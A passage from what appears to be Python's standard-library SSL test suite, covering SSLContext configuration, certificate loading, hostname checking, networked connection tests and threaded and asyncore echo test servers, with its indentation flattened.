self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
filename = u'dhpäräm.pem'
fs_encoding = sys.getfilesystemencoding()
try:
filename.encode(fs_encoding)
except UnicodeEncodeError:
self.skipTest("filename %r cannot be encoded to the filesystem encoding %r" % (filename, fs_encoding))
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
with support.temp_dir() as d:
fname = os.path.join(d, filename)
fsencoding = sys.getfilesystemencoding() or \
sys.getdefaultencoding()
try:
fname = fname.encode(fsencoding)
except:
raise unittest.SkipTest("only NT+ and systems with "
"Unicode-friendly filesystem encoding")
shutil.copy(DHFILE, fname)
ctx.load_dh_params(fname)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__https_verify_certificates(self):
# Unit test to check the contect factory mapping
# The factories themselves are tested above
# This test will fail by design if run under PYTHONHTTPSVERIFY=0
# (as will various test_httplib tests)
# Uses a fresh SSL module to avoid affecting the real one
local_ssl = support.import_fresh_module("ssl")
# Certificate verification is enabled by default
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
# Turn default verification off
local_ssl._https_verify_certificates(enable=False)
self.assertIs(local_ssl._create_default_https_context,
local_ssl._create_unverified_context)
# And back on
local_ssl._https_verify_certificates(enable=True)
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
# The default behaviour is to enable
local_ssl._https_verify_certificates(enable=False)
local_ssl._https_verify_certificates()
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
def test__https_verify_envvar(self):
# Unit test to check the PYTHONHTTPSVERIFY handling
# Need to use a subprocess so it can still be run under -E
https_is_verified = """import ssl, sys; \
status = "Error: _create_default_https_context does not verify certs" \
if ssl._create_default_https_context is \
ssl._create_unverified_context \
else None; \
sys.exit(status)"""
https_is_not_verified = """import ssl, sys; \
status = "Error: _create_default_https_context verifies certs" \
if ssl._create_default_https_context is \
ssl.create_default_context \
else None; \
sys.exit(status)"""
extra_env = {}
# Omitting it leaves verification on
assert_python_ok("-c", https_is_verified, **extra_env)
# Setting it to zero turns verification off
extra_env[ssl._https_verify_envvar] = "0"
assert_python_ok("-c", https_is_not_verified, **extra_env)
# Any other value should also leave it on
for setting in ("", "1", "enabled", "foo"):
extra_env[ssl._https_verify_envvar] = setting
assert_python_ok("-c", https_is_verified, **extra_env)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, socket.error, OSError) as e:
if e.errno in (errno.ECONNRESET, errno.EPIPE, errno.ESHUTDOWN):
# Mimick Python 3:
#
# except (ConnectionResetError, BrokenPipeError):
#
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error(
"\n server: bad connection attempt from "
+ repr(self.addr) + ":\n")
self.running = False
self.close()
return False
else:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
